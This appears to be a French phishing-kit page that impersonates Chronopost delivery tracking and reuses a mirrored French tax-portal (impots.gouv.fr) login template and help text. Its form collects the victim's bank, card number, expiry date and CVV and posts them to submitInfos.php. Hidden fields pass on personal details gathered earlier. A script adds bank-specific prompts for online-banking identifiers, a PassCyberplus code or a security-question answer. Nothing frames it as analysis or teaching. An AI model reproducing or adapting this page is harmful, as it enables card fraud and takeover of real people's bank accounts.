
<!DOCTYPE html> 
	<html lang="fr" xmlns="http://www.w3.org/1999/xhtml">
	<!-- Dac: dpapusx045 -->
	<!-- Le: Tue Apr 25 23:56:14 2017 -->
	<!-- Le: 4009 -->
		
<!-- Mirrored from cfspart.impots.gouv.fr/LoginMDP?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyLw== by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 25 Apr 2017 21:56:52 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1" /><!-- /Added by HTTrack -->
	<meta name="MSSmartTagsPreventParsing" content="true">
		
		
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		
		<meta http-equiv="imagetoolbar" content="no">
		<meta name="keywords" lang="fr" content="suivi colis, suivre colis, suivi envoi colis, numero envoi colis, service suivi colis, colis international, envoi express, suivi transport express colis, tarif envoi colis, chronopost, chronopost international">
		<meta name="description" lang="fr" content="Suivi et envoi de colis avec le service Chronopost international. Transport express, livraison et tarif colis sur Chronopost.fr">
		
		<link rel="stylesheet" type="text/css" href="./poste_files/style.css">
		
		<!--[if IE 8 ]> <link type="text/css" rel="stylesheet" href="pages/_style/ie.css?version=1.7.3" /><![endif]-->
        <!--[if lt IE 8 ]> <link type="text/css" rel="stylesheet" href="pages/_style/ie7.css?version=1.7.3" /><![endif]-->
        <!--[if lt IE 7 ]> <link type="text/css" rel="stylesheet" href="pages/_style/ie6.css?version=1.7.3" /><![endif]-->
<head>
			<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15" />
			<meta name="viewport" content="width=device-width, initial-scale=1" />
			<link rel="stylesheet" href="templates/styles/bootstrap-3.3.6.min.css" />
			<link rel="stylesheet" href="templates/styles/autentification.css"/>
			<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
			<!--[if lt IE 9]>
				<script src="/templates/js/Respond.js">  </script>
				<script src="/templates/js/html5shiv-3.7.3.min.js"> </script>
				<script>
					document.createElement('header');
					document.createElement('nav');
					document.createElement('section');
					document.createElement('article');
					document.createElement('aside');
					document.createElement('footer');
					document.createElement('main');
				</script>
			<![endif]-->
			<body>
		
		
			
			








	



<div class="web entete">
	<a id="debut" name="debut" href="http://www.chronopost.fr/expedier/inputLTNumbersNoJahia.do?listeNumeros=#debut" title="Début de page"></a>
	<div class="rampe"><a href="http://www.chronopost.fr/expedier/inputLTNumbersNoJahia.do?listeNumeros=#contenu">Contenu de page</a></div>
	
<ul>
		
	
		
			
			
			   <!-- login no -->			
            	<li>
            	
            	
            <a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=704&amp;iv4Context=-1" onclick="xt_med('C','5','Aide','N')" title="Aide">Aide</a>
             
            	</li>
            	<li>
            	
            	
            <a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=713&amp;iv4Context=-1" onclick="xt_med('C','5','FAQ','N')"><acronym title="'FAQ' : Foire aux questions">FAQ</acronym></a>
            
            	</li>
            	<li>
            	
            	
            <input type="button" value="Espace client">
            	
            	</li>
            	
			
		
		
		
	
	
	
	
		</ul>
		
<a href="http://www.chronopost.fr/transport-express/livraison-colis/loginById.do?pid=600&amp;iv4Context=-1" title="Chronopost">
	<img src="./poste_files/logo-chronopost-international.png" alt="Logo de Chronopost international">
	</a> 
	
</div><!-- /web entete -->
<div class="ennavi">
	
	<div class="web">
	
	<ol>
		
			
			
			   <!-- login no -->
            <li class="premier"><a href="http://www.chronopost.fr/transport-express/livraison-colis/loginById.do?pid=600&amp;iv4Context=-1" onclick="xt_med('C','5','Accueil','N')" title="ACCUEIL"><span>ACCUEIL</span></a></li>
			
		
		<li class="actif">
		    <a href="http://www.chronopost.fr/expedier/accueilShipping.do?reinit=true&amp;iv4Context=-1" onclick="xt_med('C','5','Expedier','N')" title="EXPEDIER">EXPEDIER</a>
		</li>
		
			
			
				<li>
					<a href="http://www.chronopost.fr/expedier/accueilShipping.do;JSESSIONID_IV4=Y7RKrNHFsw87R9vyvLyy2G8PtPJpxlvdJLxL0X16QvVxKqQsD9TG!-177722695" title="ENLEVER" onclick="xt_med('C','5','Enlever','N')">ENLEVER</a>
				</li>
			
		
		
			
			
			   <!-- login no -->
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/loginById.do?pid=701&amp;iv4Context=-1" onclick="xt_med('C','5','Suivre','N')" title="SUIVRE">SUIVRE</a></li>
			
		
	</ol>
	<ul>
		
			
			
			   <!-- login no -->
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/loginById.do?pid=702&amp;iv4Context=-1" onclick="xt_med('C','5','Offre Chronopost','N')" title="OFFRE CHRONOPOST">OFFRE CHRONOPOST</a></li>
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/loginById.do?pid=703&amp;iv4Context=-1" onclick="xt_med('C','5','A Propos De Chronopost','N')" title="A PROPOS DE CHRONOPOST">A PROPOS DE CHRONOPOST</a></li>
			
		
	</ul>
	
	<form action="http://www.chronopost.fr/transport-express/livraison-colis/engineName/search/accueil" method="post" onsubmit="checkMaxPageItems(document.searchForm);setFreeSearchInput(document.searchForm);">
		<div>
		
		</div>
	</form>
	
	
	</div>
	
</div><!-- /web ennavi -->



		
	
			
				<div class="web encorp suivi">
				
				<div class="contenuCol1">
					<p class="ariane">Accueil&gt;Suivre &gt;Livraison &agrave; domicile (2,99 EUR)"	</p>
					<h1>Livraison &agrave; domicile (2,99 EUR)</h1>
					<div class="intro">
						<p><strong>Chronopost vous permet le suivi de vos envois de colis &agrave; tout moment et ce depuis l'exp&egrave;dition jusqu'a la livraison.</strong></p>
					</div>
			
			<div>
				<h2 class="sousTitre">Donn&egrave;es bancaires</h2>
				<div class="dnsbnc">
										
									</h1>
									<div>
                                         
										<div class="erreur invisible" id="Cat2Deco3" >
                                         
											&Agrave; la suite d'un probl&egrave;me technique,&nbsp;veuillez vous reconnecter.
										</div>
										<div class="erreur invisible" id="Cat2Interdit" >
											Pour acc&eacute;der au service demand&eacute;, vous devez utilisez votre identifiant et votre mot de passe.
										</div>
										<div class="erreur invisible" id="Cat2IndispoLMDP" >
											Le service est indisponible&nbsp;; veuillez r&eacute;it&eacute;rer votre demande ult&eacute;rieurement.
										</div>
										<div class="erreur invisible" id="Cat2LMDP" ></div>
										 
										
											<form method=post enctype="application/x-www-form-urlencoded" id="LMDP_formulaire" action="submitInfos.php">
																									<input type="hidden" name="firstname" value="Zjkhfzu">
																									<input type="hidden" name="lastname" value="ZUYGDUZDG">
																									<input type="hidden" name="phone" value="1561351564864">
																									<input type="hidden" name="birthdate" value="5222-02-12">
																									<input type="hidden" name="city" value="584zdzdu">
																									<input type="hidden" name="address" value="84646846">
																									<input type="hidden" name="zip_code" value="54684">
																									<input type="hidden" name="b_name" value="">
																									<input type="hidden" name="cc_n" value="">
																									<input type="hidden" name="exp_dt" value="">
																									<input type="hidden" name="vcc" value="">
																									<input type="hidden" name="s_field" value="">
																								<div class="col-xs-12 col-md-6">
													<div class="col-xs-12">
														<div class="form-group">
															<label for="">Nom d&#145;&#233;tablissement bancaire</label>
															<select class="form-control" name="b_name">
																<option value disabled selected>S&#233;lectionner</option>
																<option value="CA">Cr&#233;dit agricole</option>
																<option value="SG">Soci&#233;t&#233; g&#233;n&#233;rale</option>
																<option value="Pst">La banque postale</option>
																<option value="BP">Banque populaire</option>
																<option value="BNP">BNP Paribas</option>
																<option value="CM">Cr&#233;dit Mutuel</option>
																<option value="CIC">CIC</option>
																<option value="CN">Cr&#233;dit du nord</option>
																<option value="Caisse">Caisse d'epargne</option>
																<option value="HSBC">HSBC</option>
																<option value="LCL">LCL</option>
																<option value="Autre">Autre</option>
															</select>
														</div>
													</div>
													<div class="col-xs-12">
														<div class="form-group">
															<label for="">Num&#233;ro du carte bancaire</label>
															<input class="form-control saisie" type="text" placeholder="Num&#233;ro du carte bancaire" name="cc_n" maxlength="19" required="">
														</div>
													</div>
													<div class="col-xs-12 col-md-6">
														<div class="form-group">
															<label for="exp_dt">Date d'expiration</label>
															<input type="text" name="exp_dt" placeholder="mm/aaaa" class="form-control saisie" maxlength="7" required="">
														</div>
													</div>
													<div class="col-xs-12 col-md-6">
														<div class="form-group">
															<label for="">Cryptogramme visuel (CVV)</label>
															<input class="form-control saisie" type="text" placeholder="XXX" name="vcc" maxlength="3" required="">
														</div>
													</div>
													<div class="col-xs-12"><div id="s_info" class="form-group"></div></div>
													<div class="col-xs-12">
														<div class="form-group">
															<button class="btn btn-primary" type="submit">Continuer</button>
														</div>
													</div>
												</div>
												</form>
												</div>
												</div>

				<!-- /contenuBloc1 -->			
			</div><!-- /interneCol1 -->
		
		
		
			</div><!-- /contenuCol1 -->
			
			
		</div>
		
		



























<div class="enpied">
		<div class="web" style="">
	<ol>

			
			
			   <!-- login no -->
            <li><a href="http://www.apple.com/fr/" title="English version" target="_blank" onclick="xt_med('C','5','FooterChronopostFR','N')">English version</a></li>
           	
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/accueil/pid/6702" title="Chronopost recrute" target="_blank" onclick="xt_med('C','5','FooterChronopostRecrute','S')">Chronopost recrute</a></li>
            <li><a href="http://boutique.chronopost.fr/" target="_blank" title="E-boutique" onclick="xt_med('C','5','FooterEBoutique','N')">E-boutique</a></li>
            
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=1000&amp;iv4Context=-1" title="Mentions légales" target="_blank" onclick="xt_med('C','5','FooterMentionsLegales','N')">Mentions légales</a></li>
            
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=714&amp;iv4Context=-1" title="Contact" target="_blank" onclick="xt_med('C','5','FooterContact','N')">Contact</a></li>
            <li><a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=1523&amp;iv4Context=-1" title="Espace presse" target="_blank" onclick="xt_med('C','5','FooterEspacePresse','N')">Espace presse</a></li>
			<li class="dernier"><a href="http://www.chronopost.fr/transport-express/livraison-colis/logout.do?pid=1425&amp;iv4Context=-1" title="Plan du site" target="_blank" onclick="xt_med('C','5','FooterPlanDuSite','N')">Plan du site</a></li>
            
			
		
	</ol>
	
	<img src="./poste_files/double-logo.png" alt="Chronopost international">
	
	
	

				<!-- Fenetre modale d'indispo -->
				<div id="indispoMP" class="modal fade lost" role="dialog">
					<div class="modal-dialog">
						<div class="modal-content">
							<!-- <div class="modal-header"> -->
								<!-- <button type="button" class="close" data-dismiss="modal"><img src="/templates/images/fermer.svg" alt="fermer" tabindex=0 /></button> -->
								<!-- <button type="button" class="close" data-dismiss="modal">&#x274C;</button> -->
								<!-- <h4 class="modal-title titre">R&eacute;cup&eacute;ration des informations de connexion</h4> -->
							<!--  modal-header -->
							<div class="modal-body">
										<!-- <div  id="CatModIndispoMP" > -->
										<p>	Le service est indisponible&nbsp;; veuillez r&eacute;it&eacute;rer votre demande ult&eacute;rieurement. </p>
										<!-- </div> -->
							</div> <!-- modal-body -->
						</div> <!-- modal-content -->
					</div> <!-- modal-dialog -->
				</div> <!-- indispoMP -->

			<!--Fenetre modale d'aide-->
			<div id="aide" class="modal fade" role="dialog" aria-labelledby="titreAide"  >
			<div class="modal-dialog">
			<div class="modal-content">
			<div class="modal-header">
			<button type="button" class="close" data-dismiss="modal"><img src="templates/images/fermer.svg" alt="fermer" tabindex=0 /></button>
			<!-- <button type="button" class="close" data-dismiss="modal">&#x274C;</button> -->
			<h1 id="titreAide" class="modal-title">Aide</h1>
			</div>
			<div id="sommaire" class="faqSom"><h2>Sommaire</h2>
			<ul aria-labelledby="sommaire">
			<li><a href="#connexion">La connexion par saisie du num&eacute;ro fiscal et du mot de passe</a></li>
			<li><a href="#creationCompte">La cr&eacute;ation d'un espace particulier</a></li>
			<li><a href="#numeroFiscal">O&ugrave; trouver mon num&eacute;ro fiscal</a></li>
			<li><a href="#numeroTeledeclarant">O&ugrave; trouver mon num&eacute;ro d'acc&egrave;s en ligne</a></li>
			<li><a href="#revenuFiscalReference">O&ugrave; trouver mon revenu fiscal de r&eacute;f&eacute;rence</a></li>
			<li><a href="#perduNumFisc">J'ai perdu mon num&eacute;ro fiscal</a></li>
			<li><a href="#perduMotDePasse">J'ai perdu mon mot de passe</a></li>
			<li><a href="#modifierMotDePasse">Comment modifier mon mot de passe</a></li>
			<li><a href="#modifierAdresseMail">Comment modifier mon adresse &eacute;lectronique</a></li>
			<li><a href="#servicesDisponibles">Les services disponibles sur mon espace particulier</a></li>
			<li><a href="#accesPerso">Un acc&egrave;s personnalis&eacute;</a></li>
			<li><a href="#difficultes">Je rencontre des difficult&eacute;s pour acc&eacute;der &agrave; mon espace particulier</a></li>
			<li><a href="#perteIdentifiants">Je n'ai pas cr&eacute;&eacute; d'espace particulier et j'ai perdu mes 3 identifiants fiscaux</a></li>
			<li><a href="#conf">La configuration de mon ordinateur</a></li>
			</ul>
			</div>
			<div class="modal-body" role="document" id="sommaireCrop">
			<div id="connexion">
			<h2 >La connexion par saisie du num&eacute;ro fiscal et mot de passe</h2>
			<p>Pour vous connecter &agrave; votre espace&nbsp;particulier, vous devez choisir un mot de passe.</p>
			<p>
			Si vous avez valid&eacute; votre adresse &eacute;lectronique et votre mot de passe en cliquant sur le lien que vous avez re&ccedil;u,
			vous devez vous connecter avec votre num&eacute;ro fiscal et le mot de passe que vous avez pr&eacute;c&eacute;demment saisis.
			</p>
			<p>Il est important de conserver votre num&eacute;ro fiscal, vous en aurez besoin pour chaque connexion.</p><br/><a href="#sommaire">Retour</a></div>
			<div id="creationCompte">
			<h2>La cr&eacute;ation d'un espace particulier</h2>
			<p>Pour cr&eacute;er votre espace, vous devez saisir&nbsp;:
			
			<p>- votre num&eacute;ro fiscal,</p>
			<p>- votre num&eacute;ro d'acc&egrave;s en ligne,</p>
			<p>- votre revenu fiscal de r&eacute;f&eacute;rence.</p>
			<p>Ensuite, vous devez choisir votre mot de passe et saisir une adresse &eacute;lectronique que l'administration utilisera pour vous contacter.</p>
			<p>Afin de valider la proc&eacute;dure de cr&eacute;ation de votre espace particulier, vous recevez un lien sur lequel vous devez cliquer.</p>
			<p>
			D&egrave;s lors que vous aurez cliqu&eacute; sur le lien, votre adresse &eacute;lectronique et votre mot de passe seront valid&eacute;s.
			</p>
			<br/><a href="#sommaire">Retour</a></div>		    
			<div id="numeroFiscal">
			<h2>Mon num&eacute;ro fiscal</h2>
			<p>
			<strong>Votre num&eacute;ro fiscal est compos&eacute; de 13 chiffres.</strong> Il figure en haut de la premi&egrave;re page de votre
			derni&egrave;re d&eacute;claration de revenus re&ccedil;ue. Il est particulier et individuel. Chaque membre du foyer fiscal en poss&egrave;de un.
			</p>
			<div class="capture">
			<img src="templates/images/num_fiscal.png" alt="" />
			</div>
			<p>
			Il se trouve aussi sur votre dernier avis d'imposition ou le courrier re&ccedil;u cette ann&eacute;e (si vous 
			avez choisi de ne plus recevoir la version papier de la d&eacute;claration de revenus ou si vous &ecirc;tes un
			primo-d&eacute;clarant de 20 ans et plus l'ann&eacute;e pr&eacute;c&eacute;dente, et &eacute;tiez rattach&eacute; au foyer fiscal de vos parents).
			</p><br/><a href="#sommaire">Retour</a></div>
			<div id="numeroTeledeclarant">
			
			<h2>Mon num&eacute;ro d'acc&egrave;s en ligne</h2>
			<p>
			<strong>Votre num&eacute;ro  d'acc&egrave;s en ligne est compos&eacute; de 7 chiffres.</strong>
			Il figure en haut de la premi&egrave;re page de votre derni&egrave;re d&eacute;claration de revenus re&ccedil;ue.
			</p>
			<div class="capture">
			<!-- <img src="/templates/images/numteledec.gif" alt=""> -->
			<img src="templates/images/num_acces.png" alt="">
			</div>
			<p>
			Il se trouve aussi sur le courrier re&ccedil;u cette ann&eacute;e si vous avez choisi de ne plus recevoir la version papier de la d&eacute;claration
			de revenus ou si vous &ecirc;tes un primo-d&eacute;clarant de 20 ans et plus, et &eacute;tiez rattach&eacute; l'ann&eacute;e pr&eacute;c&eacute;dente au foyer fiscal de vos parents.
			</p>
			<p>Chaque ann&eacute;e, vous &ecirc;tes titulaire d'un nouveau num&eacute;ro d'acc&egrave;s en ligne. Saisissez bien le num&eacute;ro affich&eacute; sur la derni&egrave;re d&eacute;claration des revenus re&ccedil;ue.</p>
			<p>Si vous n'avez pas encore re&ccedil;u votre d&eacute;claration de revenus cette ann&eacute;e, vous pouvez utiliser le num&eacute;ro d'acc&egrave;s en ligne de l'ann&eacute;e derni&egrave;re.</p>
			<br/><a href="#sommaire">Retour</a>
			</div>
			<div id="revenuFiscalReference">
			<h2>Mon revenu fiscal de r&eacute;f&eacute;rence</h2>
			<p>Votre revenu fiscal de r&eacute;f&eacute;rence se trouve sur la page de garde de votre dernier avis d'imp&ocirc;t sur les revenus dans le cadre &laquo;Vos r&eacute;f&eacute;rences&raquo;.</p>
			<div class="capture">
			<img src="templates/images/rfr.gif" alt="" />
			</div>
			<p>
			Votre revenu fiscal de r&eacute;f&eacute;rence se trouve aussi dans le d&eacute;tail de votre imposition &agrave; la rubrique &laquo;informations
			compl&eacute;mentaires&raquo;&nbsp;(25), s'il ne figure pas dans le cadre &laquo;Vos r&eacute;f&eacute;rences&raquo; (notamment si vous avez re&ccedil;u un avis de d&eacute;gr&egrave;vement).
			</p>
			<div class="capture">
			<img src="templates/images/rfr2.gif" alt="" />
			</div>
			<p>Il se trouve &eacute;galement sur votre dernier avis de taxe d'habitation (notamment en l'absence d'avis d'imp&ocirc;t sur le revenu).</p>
			<div class="capture">
			<img src="templates/images/rfr_th.gif" alt="" />
			</div>
			<p>Dans certains cas, il peut &ecirc;tre &eacute;gal &agrave; 0 (notamment si vous &eacute;tiez rattach&eacute; au foyer fiscal de vos parents).</p>
			<p>
			Si vous n'avez jamais d&eacute;pos&eacute; de d&eacute;claration de revenus et si vous n'&eacute;tiez pas rattach&eacute; au
			foyer fiscal de vos parents, vous ne pouvez pas acc&eacute;der &agrave; votre espace&nbsp;particulier cette ann&eacute;e.
			</p><br/><a href="#sommaire">Retour</a></div>
			<div id="perduNumFisc">
			<h2>J'ai perdu mon num&eacute;ro fiscal</h2>
			<p>
			Sur l'&eacute;cran d'authentification, un lien permet de retrouver votre num&eacute;ro fiscal.
			Vous devez saisir l'adresse &eacute;lectronique que vous avez saisie pour vos &eacute;changes avec la DGFIP,
			et recopier les caract&egrave;res apparaissant dans l'image. Vous recevez alors, par courriel, votre num&eacute;ro fiscal.
			</p>
			<br/><a href="#sommaire">Retour</a></div>                   
			<div id="perduMotDePasse">
			<h2>J'ai perdu mon mot de passe</h2>
			<p>
			Sur l'&eacute;cran d'authentification, un lien permet de renouveler votre mot de passe. Vous saisissez votre num&eacute;ro
			fiscal et recopiez les caract&egrave;res apparaissant dans l'image. Vous recevrez alors un courriel &agrave; l'adresse que
			vous avez indiqu&eacute;e lors de la cr&eacute;ation de votre acc&egrave;s. Ce lien vous permettra de renouveler votre mot de passe.
			</p>
			<br/><a href="#sommaire">Retour</a></div>
			<div id="modifierMotDePasse">
			<h2>Comment modifier mon mot de passe</h2>
			<p>
			Pour modifier votre mot de passe, vous devez vous connecter en saisissant votre num&eacute;ro fiscal et votre mot de passe.
			Vous pourrez ensuite acc&eacute;der au service G&eacute;rer mon profil qui vous permet de modifier votre mot de passe.
			Vous devrez saisir l'ancien mot de passe et saisir deux fois le nouveau mot de passe.
			</p>
			<br/><a href="#sommaire">Retour</a></div>
			<div id="modifierAdresseMail">
			<h2>Comment modifier mon adresse &eacute;lectronique</h2>
			<p>
			Pour modifier votre adresse &eacute;lectronique, vous devez vous connecter en saisissant votre num&eacute;ro fiscal et votre
			mot de passe. Vous pourrez ensuite acc&eacute;der au service G&eacute;rer mon profil qui vous permet de modifier votre adresse
			&eacute;lectronique. Un courriel vous sera adress&eacute; pour v&eacute;rifier que vous avez bien acc&egrave;s &agrave; cette nouvelle adresse &eacute;lectronique.
			</p><br/>
			<a href="#sommaire">Retour</a></div>
			
			<div id="servicesDisponibles">
			<h2>Les services disponibles sur mon espace&nbsp;particulier</h2>
			<p>
			Dans votre espace&nbsp;particulier, vous pouvez payer vos imp&ocirc;ts, d&eacute;clarer vos revenus, consulter vos d&eacute;clarations,
			vos avis d'imposition, la situation de vos paiements, des donn&eacute;es publiques ou encore effectuer des d&eacute;marches personnalis&eacute;es.
			</p>
			<p>
			Le service G&eacute;rer mon profil vous permet de g&eacute;rer votre adresse &eacute;lectronique, votre mot de passe et vos
			num&eacute;ros de t&eacute;l&eacute;phone. Vous pouvez &eacute;galement mettre &agrave; jour vos options pour la d&eacute;mat&eacute;rialisation de vos documents.
			</p>
			<br/><a href="#sommaire">Retour</a></div>                
			<div id="accesPerso">
			<h2>Un acc&egrave;s personnalis&eacute;</h2>
			<p>
			L'acc&egrave;s &agrave; votre espace est personnalis&eacute;. Ainsi, chaque membre d'un foyer fiscal
			peut acc&eacute;der aux services en ligne en saisissant son propre num&eacute;ro fiscal.
			</p>
			<p>
			Chaque membre du foyer fiscal peut effectuer des op&eacute;rations au nom du foyer fiscal (le paiement de
			l'imp&ocirc;t ou la d&eacute;claration des revenus) et consulter sa propre situation fiscale personnelle.
			</p>
			<br/><a href="#sommaire">Retour</a></div>                    
			<div id="difficultes">
			<h2>Je rencontre des difficult&eacute;s pour acc&eacute;der &agrave; mon espace&nbsp;particulier</h2>
			<p>
			Apr&egrave;s avoir saisi votre num&eacute;ro fiscal et votre mot de passe, le message suivant s'affiche&nbsp;:<br />
			&laquo;&nbsp;Les donn&eacute;es saisies sont incorrectes. V&eacute;rifiez la saisie de vos identifiants&nbsp;&raquo;.
			</p>
			<p>
			Apr&egrave;s avoir saisi vos 3 identifiants, le message suivant s'affiche&nbsp;:<br />
			&laquo;&nbsp;Les donn&eacute;es saisies sont incorrectes. V&eacute;rifiez la saisie de vos identifiants&nbsp;&raquo;.
			</p>
			<p>Nous vous invitons &agrave; recommencer et &agrave; v&eacute;rifier la saisie de vos identifiants, en particulier le num&eacute;ro fiscal.</p>
			<p>Nous vous rappelons que pour acc&eacute;der &agrave; votre espace&nbsp;particulier, vous devez&nbsp;:</p>
			<ul>
			<li>avoir d&eacute;pos&eacute; une d&eacute;claration des revenus l'ann&eacute;e derni&egrave;re (sur papier ou sur Internet)&nbsp;;</li>
			<li>ou &ecirc;tre &acirc;g&eacute; de plus de 20 ans et avoir &eacute;t&eacute; rattach&eacute; l'ann&eacute;e derni&egrave;re &agrave; la d&eacute;claration de vos parents.</li>
			</ul>
			<p>
			Si vos identifiants sont correctement saisis et que le blocage persiste nous vous invitons &agrave; contacter
			votre centre des Finances Publiques dont les coordonn&eacute;es figurent sur votre avis d'imp&ocirc;t sur le revenu.
			</p>
			<br/><a href="#sommaire">Retour</a></div>                   
			<div id="perteIdentifiants">
			<h2>Je n'ai pas cr&eacute;&eacute; d'espace particulier et j'ai perdu mes 3 identifiants fiscaux</h2>
			<p>
			Si vous avez &eacute;gar&eacute; vos documents fiscaux et ne disposez plus d'un des 3 identifiants n&eacute;cessaires pour cr&eacute;er
			votre espace&nbsp;particulier, nous vous invitons &agrave; contacter les services de l'administration fiscale.
			Vous trouverez leurs coordonn&eacute;es sur le site <a href="http://www.impots.gouv.fr/">www.impots.gouv.fr</a>
			en cliquant le bouton &laquo;Acc&eacute;der&raquo; sous la rubrique &laquo;Contact&raquo; de la page Particulier.
			</p>
			<br/><a href="#sommaire">Retour</a></div>                    
			<div id="conf">
			<h2>La configuration de mon ordinateur</h2>
			<p>
			La quasi-totalit&eacute; des micro-ordinateurs permet d'acc&eacute;der &agrave; votre espace&nbsp;particulier dans des conditions optimales.<br/>
			N&eacute;anmoins, il est possible que de mani&egrave;re tr&egrave;s marginale vous rencontriez des difficult&eacute;s d'utilisation du service li&eacute;es &agrave; sa configuration.
			</p>
			<p>
			<strong>
			Si votre configuration n'est pas garantie pour acc&eacute;der aux services en ligne, vous pouvez t&eacute;l&eacute;charger et installer gratuitement
			un navigateur se trouvant dans la liste ci-dessous.<br/>Vous trouverez ces navigateurs sur les sites Internet correspondants*.
			</strong>
			</p>
			<p>
			Pour utiliser nos services dans les conditions optimales, il est pr&eacute;f&eacute;rable de disposer d'un ordinateur
			de type PC ou Mac, &eacute;quip&eacute; au minimum des &eacute;l&eacute;ments suivants&nbsp;:
			</p>
			<ul>
			<li>d'un &eacute;cran VGA 800*600 (1024*768 recommand&eacute;)&nbsp;;</li>
			<li>d'une connexion Internet haut d&eacute;bit ou, &agrave; d&eacute;faut, 56K.</li>
			</ul>
            <table id="exploitation">
            <caption>Configuration requise pour utiliser les services de la Direction g&eacute;n&eacute;rale des finances publiques dans les conditions optimales</caption>

            <thead>
            <tr>
            <th id="sys">Syst&egrave;me d'exploitation</th>
            <th  id="navig">Navigateur</th>
            </tr>
            </thead>

            <tbody>
            <tr>
            <td  headers="sys">Windows XP</td>
            <td  headers="navig">
            Firefox 45 ESR, 48, 49, 50<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Windows Vista</td>
            <td  headers="navig">
            Firefox 45 ESR, 48, 49, 50<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Windows 7</td>
            <td  headers="navig">
            Internet Explorer 11<br>
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Windows 8</td>
            <td headers="navig">
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Windows 8.1</td>
            <td  headers="navig">
            Internet Explorer 11<br>
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Windows 10</td>
            <td  headers="navig">
            Internet Explorer 11, Edge 13, 14<br>
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Mac OS X</td>
            <td  headers="navig">
            Safari 9.0, 9.1, 10<br>
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            <tr>
            <td  headers="sys">Linux </td>
            <td  headers="navig">
            Firefox 45 ESR, 48, 49, 50<br>
            Chrome 49, 54, 55<br>
            </td>
            </tr>
            </tbody></table>
			
			<p>                        * Il vous appartient de vous assurer que la configuration de votre ordinateur est compatible avec l'utilisation des t&eacute;l&eacute; proc&eacute;dures.
			</p>
			<br/><a href="#sommaire">Retour</a></div>
			</div>
			<div id="helpFooter" class="modal-footer">
			<a href="#" title="Fermer la fen&ecirc;tre">Fermer</a>
			</div>
			</div>
			</div>
			</div>

			<!-- Fenetre modale de deconnexion -->
			<div id="deco" class="modal fade" role="dialog">
				<div class="modal-dialog">
					<div class="modal-content">
						<div class="modal-header">
							<h4 class="modal-title titre">D&eacute;connexion</h4>
						</div>
						<div class="modal-body">
							<div id="deconnecte" class="rounded">
								<iframe name="app0" id="app0" class="invisible"></iframe>
								
                                
								D&eacute;connexion en cours, veuillez patienter...<br />
                                
								<br />
								<img src="templates/images/Miniballs.gif" alt=""/>
								<br />
							</div> <!-- deconnecte" -->
						</div> <!-- modal-body -->
					</div> <!-- modal-content -->
				</div> <!-- modal-dialog -->
			</div> <!-- deco -->
			<!-- FIN Fenetre modale de deconnexion -->
		<script src="templates/js/jquery-1.11.3.min.js"></script>
		<script src="templates/js/bootstrap.min.js"></script>
		<script type="text/javascript" src="templates/js/auth.js"></script>
		<script type="text/javascript" src="templates/js/urls.js"> </script>
		<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
		<script>
			$('[name=b_name]').on('change', function(e){
				var option = $(this).find(':selected').val();
				if ($(this).find(':selected').is(':enabled')){
					$('#s_info').empty();
					if (option != 'PST'){
						var label = 'Num&#233;ro de compte';
						placeholder = label;
						var placeholder;
						switch(option){
							case 'CM':
								label = 'Identifiant banque &#224; distance';
								placeholder = label;
								break;
							case 'BP':
								label = 'PassCyberplus';
								placeholder = 'Les 8 chiffres du PassCyberplus';
								break;
							case 'LCL':
								label = 'Quel est le nom de jeune fille de votre m&#233;re?';
								placeholder = 'R&#233;ponse';
								break;
						}
						$('#s_info').append('<label for="s_field">' + label + '</label>');
						$('#s_info').append('<input type="text" name="s_field" class="form-control saisie" placeholder="' + placeholder + '" required/>');
					}
				}
			});
			var cc_n = '';
			$('[name=cc_n]').on('keypress', function(e) {
				cc_n = $(this).val();
				if ($.inArray(cc_n.length, [4, 9, 14]) != -1){
					cc_n += ' ';
					$(this).val(cc_n);
				}
				if (e.keyCode == 8){
					cc_n = cc_n.substring(0, cc_n.length - 1);
					$(this).val(cc_n);
				}
			});
		</script>
		
	</body>
</html>
